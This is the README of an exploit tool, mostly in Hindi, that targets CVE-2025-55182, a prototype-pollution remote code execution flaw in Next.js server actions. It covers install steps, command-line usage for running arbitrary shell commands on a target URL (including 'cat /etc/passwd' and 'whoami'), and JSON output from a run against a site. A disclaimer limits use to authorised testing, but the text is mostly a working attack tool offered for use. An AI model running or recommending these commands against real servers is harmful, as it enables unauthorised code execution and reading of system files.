
CVE-2025-55182 Next.js RCE Exploit Tool
चीनी दस्तावेज़ | कमजोरी सिद्धांत विश्लेषण
[!CAUTION]
⚠️ अस्वीकरण - उपयोग से पहले पढ़ें
यह उपकरण केवल इसके लिए है:
- सुरक्षा शोधकर्ता भेद्यता सत्यापन कर रहे हैं
- स्पष्ट अनुमति के साथ अधिकृत पैठ परीक्षण
- शैक्षिक और सीखने के उद्देश्य
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
इस उपकरण का उपयोग करके, आप सहमत हैं कि:
- आपने किसी भी सिस्टम का परीक्षण करने से पहले उचित अधिकार प्राप्त कर लिया है
- आप इस उपकरण का उपयोग दुर्भावनापूर्ण उद्देश्यों के लिए नहीं करेंगे
- आप अपने कार्यों और किसी भी परिणाम के लिए पूरी तरह जिम्मेदार हैं
लेखक इस उपकरण के दुरुपयोग के लिए कोई दायित्व नहीं लेता है।
Next.js सर्वर-साइड प्रोटोटाइप प्रदूषण भेद्यता के लिए एक दूरस्थ कोड निष्पादन (RCE) शोषण उपकरण।
CVE-2025-55182 एक गंभीर सुरक्षा भेद्यता है जो Next.js को प्रभावित करती है और हमलावरों को प्रोटोटाइप प्रदूषण का शोषण करके तैयार किए गए अनुरोधों के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देती है।
📖 विस्तृत तकनीकी विश्लेषण के लिए, EXPLOIT.md देखें
यह भेद्यता Next.js सर्वर एक्शन अनुरोध हैंडलिंग तंत्र का शोषण करती है, __proto__ प्रोटोटाइप श्रृंखला प्रदूषण के माध्यम से Function कंस्ट्रक्टर के साथ मिलकर मनमाना कोड निष्पादन प्राप्त करती है।
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
यह उपकरण परिणाम JSON प्रारूप में आउटपुट करता है:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}